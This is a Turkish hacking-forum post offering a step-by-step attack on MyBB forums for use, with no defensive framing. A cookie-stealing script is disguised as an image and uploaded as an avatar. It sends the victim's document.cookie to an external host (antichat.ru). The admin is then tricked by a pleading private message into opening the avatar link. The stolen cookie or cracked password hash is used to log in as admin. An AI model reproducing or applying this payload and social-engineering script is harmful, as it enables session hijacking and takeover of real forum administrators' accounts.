MyBB Upload Açığı, Upload'ı Olan Bütün Forum Sitelerinde

[COZy]

Evet arkadaşlar Mybb forum sitelerinde upload açığı var ve ne yazıkki kapatılamıyor.

Konumuza dönelim şimdi Mybb site adminlerinin cookie, hash, userid'lerini ele geçirmenin yöntemini anlatıyorum iyi dinleyin

Yapmamız gereken bir not defteri açıp içine

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

kodu yazıp farklı kaydet diyip ".jpg .gif" gibi resim formatına çevirmek daha sonrada bu resimi alıp MyBB yani kurban siteye üye olup avatar olarak "Gözat" diyerek kaydettiğimiz resimi siteye göndermek ve daha sonra avatar siteye upload olduğu zaman profilinizde görünmeyecektir. Sizde kendi avatarınıza sağ tıklayıp avatar uzantısını alıyorsunuz ve sitenin admin'ine

" Abiiiii yaaaa heryerde kullandığım bir avatar vaarr.. fakat bu sitede niye görünmüyorr.. yalvarırım yap şunu .." gibisinden bir özel mesaj atıyoruz ve avatar link'ini gönderiyoruz daha sonra adam avatar'a bakmak için link'e tıkladığı gibi admin cookie, hash, userid falan hepsi buraya geliyor

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

artık gerisini tahmin edebiliyorsunuzdur umarım .. Ama tahmin edemeyenler için devam edeyim barii ..
Şimdi buraya kadar herşey tamamsa [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] 'a girip cookie tarayıcısını download ediyoruz ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash'ı ile [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] 'dan kırdıktan sonra adamın nick'i ve şifresi ile online oluyoruz.. olay bu kadar basit ..